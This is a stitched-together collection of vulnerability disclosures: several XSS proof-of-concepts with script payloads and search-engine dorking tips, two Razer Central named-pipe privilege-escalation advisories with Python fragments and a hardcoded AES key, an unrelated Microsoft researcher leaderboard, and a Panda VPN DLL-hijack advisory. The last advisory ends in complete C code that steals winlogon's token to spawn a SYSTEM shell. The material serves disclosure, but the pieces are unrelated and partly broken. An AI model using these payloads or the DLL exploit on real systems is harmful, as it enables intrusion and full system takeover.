BloodBank version 1.0 suffers from a cross site scripting vulnerability.

    ======================================================================================================================================| # Title     : BloodBank v1.0 - Blood Donor Directory CMS with PayPal Integration XSS Vulnerability                                 || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/bloodbank-blood-donor-directory-cms-with-paypal-integration/21188267                     |  | # Dork      : n/a                                                                                                                  |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload in search box: <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/demosly.om/xicia/cc/bloodbank/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

BloodBank 1.0 Cross Site Scripting

Blogator version 0.93 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Blogator script v 0.93 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.blogator.net/                                                                                           |  | # Dork      : Weblogs par Blogator-script www.blogator-script.com © 2006 SAMTEK - Blogator                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : ?msg=Ce%2520pseudo%2520de%2520membre%2520est%2520inconnu%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28904707%29%3C/ScRiPt%3E[+] http://127.0.0.1//tst/?msg=Ce%2520pseudo%2520de%2520membre%2520est%2520inconnu%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28904707%29%3C/ScRiPt%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Blogator 0.93 Cross Site Scripting

Bigware Shop version 2.3 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Bigware Shop v2.3 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.bigware.de/                                                                                             |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Xss /Html inject Use Payload : /main_bigware_39.php?bigPfad=&items_id=67%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E[+] http://target_site/main_bigware_39.php?bigPfad=&items_id=67%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Bigware Shop 2.3 Cross Site Scripting

Bazaar Social Listing Shopping Web PHP Template version 2.3.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Bazaar Social Listing Shopping Web PHP Template v2.3.2 XSS Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913?s_rank=87                     |  | # Dork      : "/ad-info.php?adObjID="                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Create New User Account.[+] Edit your account https://127.0.0.1/egyptdrinkscom/settings.php or Sell an item https://127.0.0.1/egyptdrinkscom/sell-edit-stuff.php[+] Put Your Payload xss/hrml .====Greetings to :=====================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================

Bazaar Social Listing Shopping Web PHP Template 2.3.2 Cross Site Scripting

Improper Input Validation in the hyperlink interpretation in Savoir-faire Linux's Jami (version 20222284) on Windows. 

This allows an attacker to send a custom HTML anchor tag to pass a string value to the Windows QRC Handler through the Jami messenger.



To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2023-3434

Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers.
The top three researchers of the 2023 Q2 Security Researcher Leaderboard are: Yuki Chen, HAO LI, wkai!
Check out the full list of researchers recognized this quarter here.

Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers.

The top three researchers of the 2023 Q2 Security Researcher Leaderboard are: **Yuki Chen, HAO LI, wkai!**

Check out the full list of researchers recognized this quarter here.

Congratulations to the top Azure researchers this quarter: **goodbyeselene, HAO LI, basvdlouw!**

Congratulations to the top Office researchers this quarter: **Anonymous, zcgonvh, Harun Can!**

Congratulations to the top Windows researchers this quarter: **Yuki Chen, wkai, k0shl!**

This 2023 Q2 leaderboard reflects point values for cases that are:

*   Submitted and assessed by the MSRC team between April 1, 2023, and June 30, 2023
    
*   Submitted and assessed by the MSRC team between January 1, 2023, and March 31, 2023 (last program period), but assessed after April 1, 2023
    

Past MSRC Quarterly Leaderboards:

*   2023-04: MSRC 2022 Q1 Security Researcher Leaderboard
    
*   2023-01: MSRC 2022 Q4 Security Researcher Leaderboard
    
*   2022-10: MSRC 2022 Q3 Security Researcher Leaderboard
    
*   2022-07: MSRC 2022 Q2 Security Researcher Leaderboard
    
*   2022-04: MSRC 2022 Q1 Security Researcher Leaderboard
    
*   2022-02: MSRC 2021 Q4 Security Researcher Leaderboard
    
*   2021-10: MSRC 2021 Q3 Security Researcher Leaderboard
    

Keep up the awesome work and we look forward to seeing you next quarter!

_Madeline Eckert, MSRC_

Congratulations to the Top MSRC 2023 Q2 Security Researchers!

Improper Privilege Control in RazerCentralSerivce Named Pipe in Razer RazerCentral <=7.11.0.558 on Windows allows a malicious actor with local access to gain SYSTEM privilege via communicating with the named pipe as a low-privilege user and calling "AddModule" or "UninstallModules" command to execute arbitrary executable file.



**Summary**

**Product**

Razer CentralService

**Vendor**

Razer

**Severity**

High - Adversaries may exploit software vulnerabilities to obtain privilege escalation.

**Affected Versions**

Razer Central 7.11.0.558 and below

**Tested Versions**

Razer Central 7.8.0.381 to 7.11.0.558

**CVE Identifier**

CVE-2023-3514

**CVSS3.1 Scoring System**

**Base Score:** 7.8 (High) **Vector String:** CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Local

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview**

Razer Synapse 3 is a software suite developed by Razer, a leading gaming hardware manufacturer. It serves as a centralized hub for customizing and optimizing Razer peripherals, including keyboards, mice, headsets, and other gaming accessories. With its intuitive user interface, Synapse 3 allows gamers to personalize their devices by creating unique profiles, assigning macros, and fine-tuning settings such as lighting effects and DPI sensitivity. This software provides seamless integration with cloud storage, enabling users to access their personalized configurations from anywhere. With its advanced features and extensive compatibility, Razer Synapse 3 empowers gamers to enhance their gaming experience and gain a competitive edge.

**Description of the vulnerability**

There is a service named RazerCentralService.exe installed, which plays a crucial role in managing user information and notifications. Applications establish communication with this service through a namedpipe. However, an unfortunate bug exists in RazerCentralService.exe, which can potentially enable users with low privileges to execute code as the system. This vulnerability affects computers with the RazerCentralService installed.

The RazerCentralService.exe uses NamedPipe to communicate with other processes.

    pipe_name = r'\\.\pipe\{FC828A97-C116-453D-BD88-AD471496E03C}'
    

The provided code assigns the variable pipe_name with the name of the currently used pipe, represented as \\.\pipe\{FC828A97-C116-453D-BD88-AD471496E03C} in this example.

It’s important to note that several services can be accessed via NamedPipe without undergoing appropriate sanitization. This lack of sanitization exposes them to potential security risks.

    namespace Razer.ActionService
    {
    	// Token: 0x02000006 RID: 6
    	public enum RzServiceType
    	{
    		// Token: 0x0400001B RID: 27
    		UpdateManager = 2,
    		// Token: 0x0400001C RID: 28
    		AccountManager = 4,
    		// Token: 0x0400001D RID: 29
    		Notifications = 5,
    		// Token: 0x0400001E RID: 30
    		ActionCenter
    	}
    }
    

The \`UpdateManager\`\` service provides the following functionalities:

    public class UpdateManagerIpcWrapper : UpdateManagerIpcBase, IDisposable
    	{
    		// Token: 0x060002AA RID: 682 RVA: 0x00010510 File Offset: 0x0000E710
    		public UpdateManagerIpcWrapper(IUpdateController controller, IUpdateManager manager, INacServiceClient nacClient)
    		{
    			this.m_manager = manager;
    			this.m_controller = controller;
    			this.m_nacClient = nacClient;
    			this.m_controller.UpdatesAvailable += this.FireUpdatesAvailable;
    			this.m_manager.ProductRegistered += this.FireProductRegistered;
    			this.m_manager.CheckingForUpdates += this.FireCheckingForUpdates;
    			this.m_manager.InstallComplete += this.FireInstallComplete;
    			this.m_manager.DownloadProgress += this.FireDownloadProgress;
    			this.m_manager.DownloadComplete += this.FireDownloadComplete;
    			this.m_manager.ModuleInstallStart += this.FireModuleInstallStart;
    			this.m_manager.InstallProgress += this.FireInstallProgress;
    			this.m_manager.ModuleDownloadProgress += this.FireModuleDownloadProgress;
    			this.m_manager.ModuleDownloadComplete += this.FireModuleDownloadComplete;
    			this.m_manager.OptionalModuleInstallStart += this.FireOptionalModuleInstallStart;
    			this.m_manager.OptionalModuleInstallComplete += this.FireOptionalModuleInstallComplete;
    			this.m_manager.OptionalModuleUninstallStart += this.FireOptionalModuleUninstallStart;
    			this.m_manager.OptionalModuleUninstallComplete += this.FireOptionalModuleUninstallComplete;
    			manager.EndpointChange += this.FireEndpointChange;
    			base.RegisterHandler(Commands.AddModule, new Func<IRazerSocket, byte[], byte[]>(this.HandleAddModule));
    			base.RegisterHandler(Commands.RemoveModule, new Func<IRazerSocket, byte[], byte[]>(this.HandleRemoveModule));
    			base.RegisterHandler(Commands.Register, new Func<IRazerSocket, byte[], byte[]>(this.HandleRegister));
    			base.RegisterHandler(Commands.RegisterForUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleRegisterForUpdates));
    			base.RegisterHandler(Commands.GetUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetUpdates));
    			base.RegisterHandler(Commands.GetInstalledOptionalModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetInstalledOptionalModules));
    			base.RegisterHandler(Commands.GetAvailableOptionalModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetAvailableOptionalModules));
    			base.RegisterHandler(Commands.GetOptionalModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetOptionalModules));
    			base.RegisterHandler(Commands.CheckForUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleCheckForUpdates));
    			base.RegisterHandler(Commands.DownloadUpdate, new Func<IRazerSocket, byte[], byte[]>(this.HandleDownloadUpdate));
    			base.RegisterHandler(Commands.PauseDownload, new Func<IRazerSocket, byte[], byte[]>(this.HandlePauseDownload));
    			base.RegisterHandler(Commands.PauseModuleDownload, new Func<IRazerSocket, byte[], byte[]>(this.HandlePauseModuleDownload));
    			base.RegisterHandler(Commands.CancelDownload, new Func<IRazerSocket, byte[], byte[]>(this.HandleCancelDownload));
    			base.RegisterHandler(Commands.CancelModuleDownload, new Func<IRazerSocket, byte[], byte[]>(this.HandleCancelModuleDownload));
    			base.RegisterHandler(Commands.InstallUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleInstallUpdates));
    			base.RegisterHandler(Commands.GetInstalledSoftware, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetInstalledSoftware));
    			base.RegisterHandler(Commands.PostponeUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandlePostponeUpdates));
    			base.RegisterHandler(Commands.ShowUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleShowUpdates));
    			base.RegisterHandler(Commands.SetIconPath, new Func<IRazerSocket, byte[], byte[]>(this.HandleSetIconPath));
    			base.RegisterHandler(Commands.InstallModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleInstallModules));
    			base.RegisterHandler(Commands.DownloadModule, new Func<IRazerSocket, byte[], byte[]>(this.HandleDownloadModule));
    			base.RegisterHandler(Commands.UninstallModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleUninstallModules));
    			base.RegisterHandler(Commands.GetRegisteredProducts, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetRegisteredProducts));
    			base.RegisterHandler(Commands.RegisterDevices, new Func<IRazerSocket, byte[], byte[]>(this.HandleRegisterDevices));
    			base.RegisterHandler(Commands.UnregisterDevices, new Func<IRazerSocket, byte[], byte[]>(this.HandleUnregisterDevices));
    			base.RegisterHandler(Commands.ClearRegisteredDevices, new Func<IRazerSocket, byte[], byte[]>(this.HandleClearRegisteredDevices));
    			base.RegisterHandler(Commands.GetRegisteredDevices, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetRegisteredDevices));
    			base.RegisterHandler(Commands.SetEndpoint, new Func<IRazerSocket, byte[], byte[]>(this.HandleSetEndpoint));
    			base.RegisterHandler(Commands.GetEndpointDetails, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetEndpointDetails));
    			base.RegisterHandler(Commands.GetEndpointDetailsEx, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetEndpointDetailsEx));
    			base.RegisterHandler(Commands.Setting_SetCheckAutomatically, new Func<IRazerSocket, byte[], byte[]>(this.HandleCheckForUpdatesAutomatically_Set));
    			base.RegisterHandler(Commands.Setting_GetCheckAutomatically, new Func<IRazerSocket, byte[], byte[]>(this.HandleCheckForUpdatesAutomatically_Get));
    			base.RegisterHandler(Commands.Setting_SetDownloadAutomatically, new Func<IRazerSocket, byte[], byte[]>(this.HandleDownloadAutomatically_Set));
    			base.RegisterHandler(Commands.Setting_GetDownloadAutomatically, new Func<IRazerSocket, byte[], byte[]>(this.HandleDownloadAutomatically_Get));
    			base.RegisterHandler(Commands.Setting_SetUpdateInterval, new Func<IRazerSocket, byte[], byte[]>(this.HandleUpdateInterval_Set));
    			base.RegisterHandler(Commands.Setting_GetUpdateInterval, new Func<IRazerSocket, byte[], byte[]>(this.HandleUpdateInterval_Get));
    			base.RegisterHandler(Commands.Setting_SetMaxDownloadSpeed, new Func<IRazerSocket, byte[], byte[]>(this.HandleMaxDownloadSpeed_Set));
    			base.RegisterHandler(Commands.Setting_GetMaxDownloadSpeed, new Func<IRazerSocket, byte[], byte[]>(this.HandleMaxDownloadSpeed_Get));
    			base.RegisterHandler(Commands.Event_ModuleInstallStart, new Func<IRazerSocket, byte[], byte[]>(this.RouteModuleInstallStart));
    			base.RegisterHandler(Commands.Event_ModuleInstallComplete, new Func<IRazerSocket, byte[], byte[]>(this.RouteInstallProgress));
    			base.RegisterHandler(Commands.Event_InstallComplete, new Func<IRazerSocket, byte[], byte[]>(this.RouteInstallComplete));
    		}
    

After thoroughly examining the code, we stumbled upon an interesting revelation: the AddModule and UninstallModules commands possess the crucial functionality required for generating a fraudulent module and running our binary with the highly desirable SYSTEM privilege. These commands have the ability to accept input in xml formats. By cleverly constructing a malicious xml input, we can make RazerCentralService.exe to execute our binary with the mighty SYSTEM privilege.

    def add_module():
    	product = 'Emily3'
    	module = 'my_test_module'
    
    	version = struct.pack('<IIII', 0x11223344, 0x11223344, 0x11223344, 0x11223344)
    	update_module = '''
    <a>
    <Module>
    	<AdminPrivilegeRequired>1</AdminPrivilegeRequired>
    	<SynapseRestartRequired>0</SynapseRestartRequired>
    	<Description>desc</Description>
    	<Name>my_test_module</Name>
    	<DisplayName>my_test_module</DisplayName>
    	<FileName>D:\\test.exe</FileName>
    	<Visible>1</Visible>
    	<IconPath>C:\\ProgramData\\Razer\\Razer Central\\Update\\GameBooster2\\AppIcon.ico</IconPath>
    	<LaunchFilePath>D:\\test.exe</LaunchFilePath>
    	<DownloadURL>http://127.0.0.1</DownloadURL>
    	<UninstallFilePath>C:\\Windows\\System32\\notepad.exe</UninstallFilePath>
    </Module>
    </a>
    '''
    
    def uninstall_modules():
    	product = 'Emily3'
    	modules = '''
    	<a>
    		<String>my_test_module</String>
    	</a>
    '''
    
    	data = serialize_string(product)
    	data += serialize_string(modules)
    
    	p = create_message(UpdateManager, UninstallModules, data)
    	send_packet(p)
    

Here is a proof of concept (POC) written in Python 2 that you can use to execute notepad.exe as the SYSTEM user. Simply run the POC code provided here.

**Reproduction Steps**

For simplicity, follow the following steps to re-produce.

1.  Install the Razer software.
2.  Install Python 2 and the necessary Python modules.
3.  Log in and wait for 3-5 minutes to ensure that the directory at C:\ProgramData\Razer\Razer Central\Accounts exists.
4.  Execute the exploit script using Python 2.

**Conclusion**

In summary, relying on an encrypted file with a hardcoded key is not a dependable security measure. When operating as the SYSTEM user, it is crucial to exercise prudence in your actions. To tackle this problem, consider implementing the following measures:

*   Verify that the NamedPipe has the appropriate permissions configured.
*   Sanitize any untrusted input originating from the NamedPipe to prevent potential vulnerabilities.

**Credits**

Phan Thanh Duy (@PTDuy) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

CVE-2023-3514: (CVE-2023-3514) RazerCentralSerivce unsafe NamedPipe permission Escalation of Privilege Vulnerability

Improper Privilege Control in RazerCentralSerivce Named Pipe in Razer RazerCentral <=7.11.0.558 on Windows allows a malicious actor with local access to gain SYSTEM privilege via communicating with the named pipe as a low-privilege user and triggering an insecure .NET deserialization.

**Summary**

**Product**

Razer CentralService

**Vendor**

Razer

**Severity**

High - Adversaries may exploit software vulnerabilities to obtain privilege escalation.

**Affected Versions**

Razer Central 7.11.0.558 and below

**Tested Versions**

Razer Central 7.8.0.381 to 7.11.0.558

**CVE Identifier**

CVE-2023-3513

**CVSS3.1 Scoring System**

**Base Score:** 7.8 (High) **Vector String:** CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Local

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview**

Razer Synapse 3 is a software suite developed by Razer, a leading gaming hardware manufacturer. It serves as a centralized hub for customizing and optimizing Razer peripherals, including keyboards, mice, headsets, and other gaming accessories. With its intuitive user interface, Synapse 3 allows gamers to personalize their devices by creating unique profiles, assigning macros, and fine-tuning settings such as lighting effects and DPI sensitivity. This software provides seamless integration with cloud storage, enabling users to access their personalized configurations from anywhere. With its advanced features and extensive compatibility, Razer Synapse 3 empowers gamers to enhance their gaming experience and gain a competitive edge.

**Description of the vulnerability**

One of these services is called RazerCentralService.exe, which acts as a central service for managing user information and notifications. Other applications can communicate with this service through a named pipe. However, there is a bug in RazerCentralService.exe that allows a user with low privileges to execute code as a system on a machine with RazerCentralService installed.

While analyzing Razer software, we found that a file called RazerCentralService.exe``, which runs under the SYSTEM\`\` account, tries to access a non-existent file located at the following path:

    'C:\\ProgramData\\Razer\\Razer Central\\Accounts\\' + dirname +'\\Razer Central\\ConnectedAccounts\\ConnectedAccounts.bin'
    

The dirname variable represents a folder that begins with the prefix RZR_ followed by a series of hexadecimal characters. This folder is automatically generated once the user successfully logs into the system. Furthermore, we also verified the permissions assigned to the Razer Central folder.

    s:\windows\razer>icacls "C:\ProgramData\Razer\Razer Central\Accounts\RZR_xxxxxxxxxxxxxxxxxxxx\Razer Central"
    C:\ProgramData\Razer\Razer Central\Accounts\RZR_xxxxxxxxxxxxxxxxxxxx\Razer Central NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                                                               BUILTIN\Administrators:(I)(OI)(CI)(F)
                                                                                               CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                                                               BUILTIN\Users:(I)(OI)(CI)(RX)
                                                                                               BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
    
    Successfully processed 1 files; Failed processing 0 files
    

Within this directory, we possess the flexibility to incorporate files or folders. Additionally, we hold the capability to substitute the ConnectedAccounts\ConnectedAccounts.bin file with our personalized iteration. This particular binary file is safeguarded through encryption, utilizing the AES-CBC algorithm. Notably, it employs a hardcoded key that conveniently facilitates both encryption and decryption operations.

    def decrypt_ConnectedAccounts():
    	iv = "RZR_0280d8694a5582614c434074453e"[:16].encode('utf-8')
    	key = base64.b64decode("11Ir9bXYlDOU0xiKQszUlZ2N57TNS/GCAyLnZfj6Ibo=")
    	print (len(key)*8)
    	ciphertext = open(r"C:\ProgramData\Razer\Razer Central\Accounts\RZR_0280d8694a5582614c434074453e\Razer Central\ConnectedAccounts\ConnectedAccounts.bin", 'rb').read()
    	print ('===========')
    	cipher = AES.new(key, AES.MODE_CBC, iv)
    	plaintext = cipher.decrypt(ciphertext)
    	print (plaintext)
    	print ('================')
    

The code snippet below demonstrates the execution of a specific piece of code when the ConnectedAccounts.bin file undergoes deserialization using a binary formatter. This code is located within the AccountManager.dll module, which is loaded by the RazerCentralService.exe process.

    		private void Load()
    		{
    			try
    			{
    				SettingReadResult setting = this.m_settingsController.GetSetting("Razer Central", "ConnectedAccounts", "ConnectedAccounts.bin", SettingSource.Local, SettingSource.Undefined);
    				if (!setting.Success)
    				{
    					if (setting.ResultLocal == LoadResult.Failed_DataNotFound)
    					{
    						ConnectedAccountsManager.Logger.Info("No connected account credentials found.");
    					}
    					else
    					{
    						ConnectedAccountsManager.Logger.Error("Failed to load connected account credentials: " + setting.ResultLocal);
    					}
    				}
    				else
    				{
    					using (MemoryStream memoryStream = new MemoryStream(setting.Setting.Value))
    					{
    						Aes aes = Aes.Create();
    						aes.BlockSize = 128;
    						aes.KeySize = 256;
    						aes.Key = Convert.FromBase64String(ConnectedAccountsManager.m_keyString);
    						aes.IV = this.IV;
    						using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
    						{
    							BinaryFormatter binaryFormatter = new BinaryFormatter();
    							this.m_credentials = (Dictionary<ConnectedAccount, ConnectedAccountCredentials>)binaryFormatter.Deserialize(cryptoStream);
    						}
    					}
    				}
    			}
    			catch (Exception exception)
    			{
    				ConnectedAccountsManager.Logger.Error("Exception loading connected account credentials", exception);
    				this.m_credentials = new Dictionary<ConnectedAccount, ConnectedAccountCredentials>();
    				this.Save();
    			}
    		}
    

By leveraging the power of ysoserial.net, we gain the ability to execute code with elevated privileges as the SYSTEM user. This process of deserialization occurs in two scenarios: when a user logs in or when the machine restarts. Moreover, we can also initiate the deserialization process by utilizing a named pipe. Notably, the RazerCentralService.exe grants read/write access to its pipe for all users.

    pipe_name = r'\\.\pipe\{FC828A97-C116-453D-BD88-AD471496E03C}'
    

Here is a proof of concept (POC) written in Python 2 that you can use to execute notepad.exe as the SYSTEM user. Simply run the POC code provided here

**Reproduction Steps**

For simplicity, follow the following steps to re-produce.

1.  Install the Razer software.
2.  Install Python 2 and the necessary Python modules.
3.  Log in and wait for 3-5 minutes to ensure that the directory at C:\ProgramData\Razer\Razer Central\Accounts exists.
4.  Execute the exploit script using Python 2.

**Conclusion**

Having great power entails having great responsibility. When you operate as the SYSTEM user, you possess substantial power and carry significant responsibilities. Therefore, it is crucial to exercise caution in your actions. Additionally, it is important to understand that relying solely on an encrypted file with a hardcoded key does not guarantee security. To address any potential issues, you can follow the suggested steps outlined below:

*   Avoid using binary formatter for deserialization.
*   Ensure correct permissions are set for your namedpipe.
*   Check your directory permissions.

**Credits**

Phan Thanh Duy (@PTDuy) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

CVE-2023-3513: (CVE-2023-3513) RazerCentralService unsafe deserialization Escalation of Privilege Vulnerability

A DLL hijacking vulnerability in Panda Security VPN for Windows prior to version v15.14.8 allows attackers to execute arbitrary code via placing a crafted DLL file in the same directory as PANDAVPN.exe.

**0x01: Details**

*   Title: Local privilege escalation in Panda Dome VPN for Windows Installer
*   CVE ID: None
*   Vendor ID : None
*   Advisory Published: 2023/07/05
*   Advisory URL : https://www.pandasecurity.com/en/support/card?id=100080

**0x02: Test Environment**

Panda Dome Version : 21.01.00

OS : Windows 10 Pro 64-bit 21H2 (build 19044.1826)

**0x03: Vulnerability details**

Vulnerability that allows a local attacker to gain SYSTEM privileges by exploiting administrator privileges, and that enables the server thread to perform actions on behalf of the client, but within the limits of the client’s security context.

**0x04: Technical description**

Many DLLs are loaded from the directory where the Panda Security VPN installer file PANDAVPN.exe is located. If these DLLs are not in the directory, DLLs are loaded from the C:\Windows\SysWOW64 directory. Among these Dlls, TextShaping.dll is loaded, and this DLL load is done with Administrator privileges. So, by placing TextShaping.dll in the directory where the Panda Security VPN installer file is located, you can gain SYSTEM privileges by abusing Administrator privileges.

**0x05: Proof-of-Concept (PoC)**

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147

#include <stdio.h>
#include <windows.h>
#include <Psapi.h>
#include <Tlhelp32.h>
#include <sddl.h>
#pragma comment (lib,"advapi32.lib")
int exploit() {
	DWORD lpidProcess[2048], lpcbNeeded, cProcesses;
	EnumProcesses(lpidProcess, sizeof(lpidProcess), &lpcbNeeded);
	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

	PROCESSENTRY32 p32;
	p32.dwSize = sizeof(PROCESSENTRY32);

	int processWinlogonPid;

	if (Process32First(hSnapshot, &p32)) {
		do {
			if (wcscmp(p32.szExeFile, L"winlogon.exe") == 0) {
				printf("[+] Located winlogon.exe by process name (PID %d)\n", p32.th32ProcessID);
				processWinlogonPid = p32.th32ProcessID;
				break;
			}
		} while (Process32Next(hSnapshot, &p32));

		CloseHandle(hSnapshot);
	}

	LUID luid;
	HANDLE currentProc = OpenProcess(PROCESS_ALL_ACCESS, 0, GetCurrentProcessId());

	if (currentProc) {
		HANDLE TokenHandle = NULL;
		BOOL hProcessToken = OpenProcessToken(currentProc, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &TokenHandle);
		if (hProcessToken) {
			BOOL checkToken = LookupPrivilegeValue(NULL, L"SeDebugPrivilege", &luid);

			if (!checkToken) {
				printf("[+] Current process token already includes SeDebugPrivilege\n");
			}
			else {
				TOKEN_PRIVILEGES tokenPrivs;

				tokenPrivs.PrivilegeCount = 1;
				tokenPrivs.Privileges[0].Luid = luid;
				tokenPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

				BOOL adjustToken = AdjustTokenPrivileges(TokenHandle, FALSE, &tokenPrivs, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL);

				if (adjustToken != 0) {
					printf("[+] Added SeDebugPrivilege to the current process token\n");
				}
			}
			CloseHandle(TokenHandle);
		}
	}
	CloseHandle(currentProc);

	HANDLE hProcess = NULL;
	HANDLE TokenHandle = NULL;
	HANDLE NewToken = NULL;
	BOOL OpenToken;
	BOOL Impersonate;
	BOOL Duplicate;

	hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, processWinlogonPid);

	if (!hProcess) {
		printf("[-] Failed to obtain a HANDLE to the target PID\n");
		return -1;
	}

	printf("[+] Obtained a HANDLE to the target PID\n");

	OpenToken = OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &TokenHandle);

	if (!OpenToken) {
		printf("[-] Failed to obtain a HANDLE to the target TOKEN %d\n", GetLastError());
	}

	printf("[+] Obtained a HANDLE to the target TOKEN\n");

	Impersonate = ImpersonateLoggedOnUser(TokenHandle);

	if (!Impersonate) {
		printf("[-] Failed to impersonate the TOKEN's user\n");
		return -1;
	}

	printf("[+] Impersonated the TOKEN's user\n");

	Duplicate = DuplicateTokenEx(TokenHandle, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &NewToken);

	if (!Duplicate) {
		printf("[-] Failed to duplicate the target TOKEN\n");
		return -1;
	}

	printf("[+] Duplicated the target TOKEN\n");

	BOOL NewProcess;

	STARTUPINFO lpStartupInfo = { 0 };
	PROCESS_INFORMATION lpProcessInformation = { 0 };

	lpStartupInfo.cb = sizeof(lpStartupInfo);

	NewProcess = CreateProcessWithTokenW(NewToken, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &lpStartupInfo, &lpProcessInformation);

	if (!NewProcess) {
		printf("[-] Failed to create a SYSTEM process\n");
		return -1;
	}

	printf("[+] Created a SYSTEM process\n");

	CloseHandle(NewToken);
	CloseHandle(hProcess);
	CloseHandle(TokenHandle);

	return 0;
}

BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    switch (fdwReason) {
        case DLL_PROCESS_ATTACH: {
			exploit();
			exit(-1);
            break;
        }

        case DLL_THREAD_ATTACH: {
            break;
        }

        case DLL_THREAD_DETACH: {
            break;
        }

        case DLL_PROCESS_DETACH: {
            break;
        }
    }
    return TRUE;
